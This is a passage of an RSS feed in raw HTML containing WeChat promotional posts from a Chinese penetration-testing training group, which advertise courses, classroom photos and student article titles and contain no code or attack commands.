26px;text-indent: 2em;">宽字节安全团队自成立以来，一直想做很多事情，例如漏洞挖掘，红蓝对抗，C2开发，漏洞复现等等。但是我们精力有限，所以我们选择全职创业来完成自己的梦想。我们想将我们在一线攻防领域的经验分享给大家。一方面，我们需要培训来积累启动资金，另一方面能通过培训去结识志同道合的伙伴一起做有趣的事。</section><h2 data-tool="mdnice编辑器" style="font-size: 22px;margin-top: 30px;margin-bottom: 15px;font-weight: bold;"><span style="display: none;"></span>为什么选择我们</h2><ol data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">宽字节有自己的安全理念，不同于只讲解工具使用的教程，宽字节<strong><span style="color: rgb(255, 0, 0);">更注重原理与基础</span></strong>，万丈高楼平地起，我们将带领学员深入漏洞的本质，探索安全的魅力</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">团队有丰富的红蓝对抗经验，一线红队与安全研究的师傅全程线下授课</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">教学内容通俗易懂，贴合实战，<strong><span style="color: rgb(255, 0, 0);">紧密贴合一线攻防人员的需求</span></strong></section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">宽敞明亮的教室，各种靶机供学员练习，良好的学习氛围</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">大量的信息安全类书籍供学员借阅，内部资料向学员开放</section></li></ol><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;">有了 <strong>第一期培训</strong> 的经验，我们重新梳理细化了整个课程体系和教学资料。增加了 <span style="color: rgb(255, 0, 0);"><strong>阶梯性教学</strong> </span>和 <span style="color: rgb(255, 0, 0);"><strong>分班机制</strong></span> 。让基础好的同学能够在学习中沉淀更多东西，基础较弱的同学增加大量基础内容的实战训练，快速提升。让学员在完成培训后，能够深入本质，熟悉漏洞的成因，利用与防护规则。独立完成整个渗透测试流程，积累一定的漏洞分析，内网渗透，域渗透的经验，对安全有自己的认识。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><strong>宽字节安全第一期线下培训已经进行了一半了，来一起看看下线培训的情况吧</strong>。</p><h2 data-tool="mdnice编辑器" style="font-size: 22px;margin-top: 30px;margin-bottom: 15px;font-weight: bold;"><span style="display: none;"></span>展示</h2><ul data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">内部 Wiki</section></li></ul><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.5461658841940532" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1917" src="https://wechat2rss.xlab.app/img-proxy/?k=d406714c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyPHTg6VZhU2mvw4Sk0yCr6Plq656Mm96cjYLIFdmZEBu7CibrgkaeA0Q%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.6217783505154639" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1552" src="https://wechat2rss.xlab.app/img-proxy/?k=33dd498c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRy0Z8pWAAv9QsCQsicUdEiaeHMicXm4z2SwicdRjNpttvNcTufnibeibcViaUyg%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.8030203545633617" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1523" src="https://wechat2rss.xlab.app/img-proxy/?k=529ed250&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyZiaTFQRW1ibwibiceUkslVOQgMYJSWXZJVhMF8oy6XEia8fGTeeE6wbZN4w%2F640%3Fwx_fmt%3Dpng"/></figure><ul data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">学习环境</section></li></ul><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.75" style="display: block;margin-right: auto;margin-left: auto;" data-type="jpeg" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=cc930810&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyOekrplmYFPMWyDJvJD2rEOlp6tdYZZaCK1TMwhicktUmSnibb0AVwYCw%2F640%3Fwx_fmt%3Djpeg"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.46171875" style="display: block;margin-right: auto;margin-left: auto;" data-type="jpeg" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=695b456f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyj6Goric360GYf4AA47hXvSSPU4KTCVfvl5Bibs2UN7worfFdRDWkibbmA%2F640%3Fwx_fmt%3Djpeg"/></figure><ul data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">学习氛围</section></li></ul><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.7502287282708143" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1093" src="https://wechat2rss.xlab.app/img-proxy/?k=d94eebef&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyLoWZ6pjiaPHHicLawngSqZnSI1lgBqdYyQoqG17IzkCuSfTyKpXLyBnQ%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.7502287282708143" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1093" src="https://wechat2rss.xlab.app/img-proxy/?k=7aa3ab25&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRysRdcZU4N0lPhpsn5R0pichur2Q4Ty5FUE0xExJ2Ep4EZM8Ra4U2knyw%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;">学员们自行组织相约早晨 7点多 提前到教室学习，学到晚上十点以后走已经成了大家的日常，无任何强制性，全凭大家对网络安全的热爱。</p><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="2.132492113564669" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="317" src="https://wechat2rss.xlab.app/img-proxy/?k=59656361&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRySCgJPadO37ofnkqlAffZBtGtlhOy7LzaiaoVT0edzLo9sfvZFRJ4XFw%2F640%3Fwx_fmt%3Dpng"/></figure><ul data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">学员笔记</section></li></ul><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.39803625377643503" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1324" src="https://wechat2rss.xlab.app/img-proxy/?k=9ef4ff43&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyQAWSMBmAX9Eey8XX0F1ibENgibccKibRUKTJ2bRL8PAuS8tsjgR2gLvibQ%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.6163522012578616" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="795" src="https://wechat2rss.xlab.app/img-proxy/?k=d8918914&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRymHaCBuiaibeKeiaqVNt4mswkqyicJt2TicuCGkAo9rR0NSHyUvh1LJIB4lg%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.5453501722158438" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1742" src="https://wechat2rss.xlab.app/img-proxy/?k=84e9745f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRy6xtMTAOaO3Rv9DceR4PBxNN8dnzIU0h6S1NRQlWajurYgBtf5XiaEOQ%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.6302521008403361" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="952" src="https://wechat2rss.xlab.app/img-proxy/?k=fe44f0cf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyvrBlYca7AsviaHg7iapvpj5NsJOwuoJWJ27ur0GmybV3qN2ycEynpEcA%2F640%3Fwx_fmt%3Dpng"/></figure><ul data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">学员文章</section></li></ul></section><p style="margin-top: 5px;margin-bottom: 5px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485144&amp;idx=1&amp;sn=a496314f488c5fc5ed555ea6dbdd8130&amp;chksm=fa8b1b40cdfc92567694e85dca4e77f7e7220b866d333c1fb63703868701876fe086a1dacb85&amp;scene=21#wechat_redirect" textvalue="Windows 名称解析机制" data-itemshowtype="0" tab="innerlink" data-linktype="2">Windows 名称解析机制</a></p><p style="margin-top: 5px;margin-bottom: 5px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485292&amp;idx=1&amp;sn=033571585b6565290b17d85d241d50ba&amp;chksm=fa8b1af4cdfc93e23ab0e2f24b86eca5073e62a733dc1ffc82eb87b44f76b87f75ac56174a11&amp;scene=21#wechat_redirect" textvalue="记一次 mssql 注入到 getshell" data-itemshowtype="0" tab="innerlink" data-linktype="2">记一次 mssql 注入到 getshell</a></p><p style="margin-top: 5px;margin-bottom: 5px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485235&amp;idx=1&amp;sn=2b68f16d107880349d9e241f6f03db2a&amp;chksm=fa8b1aabcdfc93bdc2397a4b9143d2a42a626090b574e7c83b3d9f57e88950fa6dfefebf97a3&amp;scene=21#wechat_redirect" textvalue="记一次 weblogic 的域渗透实战" data-itemshowtype="0" tab="innerlink" data-linktype="2">记一次 weblogic 的域渗透实战</a></p><p style="margin-top: 5px;margin-bottom: 5px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485181&amp;idx=1&amp;sn=65ac8c1db32b1e849533438a4d7bba1d&amp;chksm=fa8b1b65cdfc9273e99f90f1446c8a230ad92edfb9e7d75fb8396c9bfbb62db77bdeb3746a04&amp;scene=21#wechat_redirect" textvalue="利用安全描述符隐藏服务后门进行权限维持" data-itemshowtype="0" tab="innerlink" data-linktype="2">利用安全描述符隐藏服务后门进行权限维持</a></p><p style="margin-top: 5px;margin-bottom: 5px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485144&amp;idx=1&amp;sn=a496314f488c5fc5ed555ea6dbdd8130&amp;chksm=fa8b1b40cdfc92567694e85dca4e77f7e7220b866d333c1fb63703868701876fe086a1dacb85&amp;scene=21#wechat_redirect" textvalue="Windows 身份认证" data-itemshowtype="0" tab="innerlink" data-linktype="2">Windows 身份认证</a></p><section data-tool="mdnice编辑器" data-website="https://www.mdnice.com" style="color: black;padding-right: 10px;padding-left: 10px;line-height: 1.6;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><ul data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">实战项目</section></li></ul><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;">涉密，暂不展示。</p><h2 data-tool="mdnice编辑器" style="font-size: 22px;margin-top: 30px;margin-bottom: 15px;font-weight: bold;"><span style="display: none;"></span>联系我们</h2></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="1.3936170212765957" data-s="300,640" style="" data-type="png" data-w="564" src="https://wechat2rss.xlab.app/img-proxy/?k=e9207b1f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEGnzia9FAtMgeVYJQDibUw6M1Uu0iaB14smHeX2mWfPbc7l4pCZLqokCmiaiaFiavIianxCosOicvZUAUluw%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p>



<p><a href="2247485459">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=17676f38&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUzNTEyMTE0Mw%3D%3D%26mid%3D2247485459%26idx%3D1%26sn%3Db908ac5751e62764e0e1c23ce498a819%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 05 Oct 2021 10:30:00 +0800</pubDate>
    </item>
    <item>
      <title>宽字节安全“第二期线下就业班”重磅来袭！！！</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485457&amp;idx=1&amp;sn=8a545fc6473a94a1be0a6efe524c40a4</link>
      <description>&#34;任何职业都可以成为黑客。&#34; ——引自《黑客伦理与信息时代精神》。线下就业班宽字节安全线下就业班 第二期，于</description>
      <content:encoded><![CDATA[<p>
原创 <span>unicodesec</span> <span>2021-10-03 10:30</span> <span style="display: inline-block;"></span>
</p>

<p>"任何职业都可以成为黑客。" ——引自《黑客伦理与信息时代精神》。线下就业班宽字节安全线下就业班 第二期，于</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=3d57459d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyCia1G52RNH1EzyFqbsQSjQtnIYad2mezC1ma24I5N5VLDPYNQl3GHnw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section data-tool="mdnice编辑器" data-website="https://www.mdnice.com" style="color: black;padding-right: 10px;padding-left: 10px;line-height: 1.6;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><blockquote data-tool="mdnice编辑器" style="font-size: 0.9em;border-top: none;border-right: none;border-bottom: none;overflow: auto;border-left-color: rgba(0, 0, 0, 0.4);background: rgba(0, 0, 0, 0.05);color: rgb(106, 115, 125);padding: 10px 10px 10px 20px;margin-bottom: 20px;margin-top: 20px;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;color: black;line-height: 26px;">&#34;任何职业都可以成为黑客。&#34; ——引自《黑客伦理与信息时代精神》。</p></blockquote><h4 data-tool="mdnice编辑器" style="font-size: 18px;margin-top: 30px;margin-bottom: 15px;font-weight: bold;"><span style="display: none;"></span>线下就业班<span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485438&amp;idx=2&amp;sn=ba0c436a8656b65a90a120250a6670be&amp;chksm=fa8b1a66cdfc937075e55cda1a1b3f38b16a8ea6925efcb6dbbdbdc30cd99ff289e0853d2f2e&amp;scene=21#wechat_redirect" textvalue="宽字节安全线下培训班" data-itemshowtype="0" tab="innerlink" style="color: rgb(255, 0, 0);text-decoration: underline;" data-linktype="2"><span style="color: rgb(255, 0, 0);">宽字节安全线下就业班</span></a> 第二期，于 2021 年 11 月 25 号开班。</p><h4 data-tool="mdnice编辑器" style="font-size: 18px;margin-top: 30px;margin-bottom: 15px;font-weight: bold;"><span style="display: none;"></span>线上专题班<span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485438&amp;idx=3&amp;sn=663da8762314aff8bcf0e359b1107f0f&amp;chksm=fa8b1a66cdfc937008f2d300f78e22b81a04a3ab429e2e1d0ef3931002e09f06ae36abe67231&amp;scene=21#wechat_redirect" textvalue="内网渗透专题班" data-itemshowtype="0" tab="innerlink" style="color: rgb(255, 0, 0);text-decoration: underline;" data-linktype="2"><span style="color: rgb(255, 0, 0);">内网渗透专题班</span></a> ，于 2021 年 11 月 15 号开班。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485438&amp;idx=4&amp;sn=79c3f911a4c077de56163ba30783f0f3&amp;chksm=fa8b1a66cdfc9370d918a50263dabfb359dd77c858ec187816601505dd7bd0e3aea4c59eb77d&amp;scene=21#wechat_redirect" textvalue="JAVA安全专题班 第二期" data-itemshowtype="0" tab="innerlink" style="color: rgb(255, 0, 0);text-decoration: underline;" data-linktype="2"><span style="color: rgb(255, 0, 0);">JAVA安全专题班 第二期</span></a> ，于 2021 年 11 月 15 号开班。</p><h2 data-tool="mdnice编辑器" style="font-size: 22px;margin-top: 30px;margin-bottom: 15px;font-weight: bold;"><span style="display: none;"></span>为什么办培训</h2><section style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;text-indent: 2em;">宽字节安全团队自成立以来，一直想做很多事情，例如漏洞挖掘，红蓝对抗，C2开发，漏洞复现等等。但是我们精力有限，所以我们选择全职创业来完成自己的梦想。我们想将我们在一线攻防领域的经验分享给大家。一方面，我们需要培训来积累启动资金，另一方面能通过培训去结识志同道合的伙伴一起做有趣的事。</section><h2 data-tool="mdnice编辑器" style="font-size: 22px;margin-top: 30px;margin-bottom: 15px;font-weight: bold;"><span style="display: none;"></span>为什么选择我们</h2><ol data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">宽字节有自己的安全理念，不同于只讲解工具使用的教程，宽字节<strong><span style="color: rgb(255, 0, 0);">更注重原理与基础</span></strong>，万丈高楼平地起，我们将带领学员深入漏洞的本质，探索安全的魅力</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">团队有丰富的红蓝对抗经验，一线红队与安全研究的师傅全程线下授课</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">教学内容通俗易懂，贴合实战，<strong><span style="color: rgb(255, 0, 0);">紧密贴合一线攻防人员的需求</span></strong></section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">宽敞明亮的教室，各种靶机供学员练习，良好的学习氛围</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">大量的信息安全类书籍供学员借阅，内部资料向学员开放</section></li></ol><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;">有了 <strong>第一期培训</strong> 的经验，我们重新梳理细化了整个课程体系和教学资料。增加了 <span style="color: rgb(255, 0, 0);"><strong>阶梯性教学</strong> </span>和 <span style="color: rgb(255, 0, 0);"><strong>分班机制</strong></span> 。让基础好的同学能够在学习中沉淀更多东西，基础较弱的同学增加大量基础内容的实战训练，快速提升。让学员在完成培训后，能够深入本质，熟悉漏洞的成因，利用与防护规则。独立完成整个渗透测试流程，积累一定的漏洞分析，内网渗透，域渗透的经验，对安全有自己的认识。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><strong>宽字节安全第一期线下培训已经进行了一半了，来一起看看下线培训的情况吧</strong>。</p><h2 data-tool="mdnice编辑器" style="font-size: 22px;margin-top: 30px;margin-bottom: 15px;font-weight: bold;"><span style="display: none;"></span>展示</h2><ul data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">内部 Wiki</section></li></ul><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.5461658841940532" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1917" src="https://wechat2rss.xlab.app/img-proxy/?k=d406714c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyPHTg6VZhU2mvw4Sk0yCr6Plq656Mm96cjYLIFdmZEBu7CibrgkaeA0Q%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.6217783505154639" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1552" src="https://wechat2rss.xlab.app/img-proxy/?k=33dd498c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRy0Z8pWAAv9QsCQsicUdEiaeHMicXm4z2SwicdRjNpttvNcTufnibeibcViaUyg%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.8030203545633617" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1523" src="https://wechat2rss.xlab.app/img-proxy/?k=529ed250&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyZiaTFQRW1ibwibiceUkslVOQgMYJSWXZJVhMF8oy6XEia8fGTeeE6wbZN4w%2F640%3Fwx_fmt%3Dpng"/></figure><ul data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">学习环境</section></li></ul><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.75" style="display: block;margin-right: auto;margin-left: auto;" data-type="jpeg" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=cc930810&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyOekrplmYFPMWyDJvJD2rEOlp6tdYZZaCK1TMwhicktUmSnibb0AVwYCw%2F640%3Fwx_fmt%3Djpeg"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.46171875" style="display: block;margin-right: auto;margin-left: auto;" data-type="jpeg" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=695b456f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyj6Goric360GYf4AA47hXvSSPU4KTCVfvl5Bibs2UN7worfFdRDWkibbmA%2F640%3Fwx_fmt%3Djpeg"/></figure><ul data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">学习氛围</section></li></ul><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.7502287282708143" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1093" src="https://wechat2rss.xlab.app/img-proxy/?k=d94eebef&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyLoWZ6pjiaPHHicLawngSqZnSI1lgBqdYyQoqG17IzkCuSfTyKpXLyBnQ%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.7502287282708143" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1093" src="https://wechat2rss.xlab.app/img-proxy/?k=7aa3ab25&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRysRdcZU4N0lPhpsn5R0pichur2Q4Ty5FUE0xExJ2Ep4EZM8Ra4U2knyw%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;">学员们自行组织相约早晨 7点多 提前到教室学习，学到晚上十点以后走已经成了大家的日常，无任何强制性，全凭大家对网络安全的热爱。</p><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="2.132492113564669" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="317" src="https://wechat2rss.xlab.app/img-proxy/?k=59656361&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRySCgJPadO37ofnkqlAffZBtGtlhOy7LzaiaoVT0edzLo9sfvZFRJ4XFw%2F640%3Fwx_fmt%3Dpng"/></figure><ul data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">学员笔记</section></li></ul><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.39803625377643503" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1324" 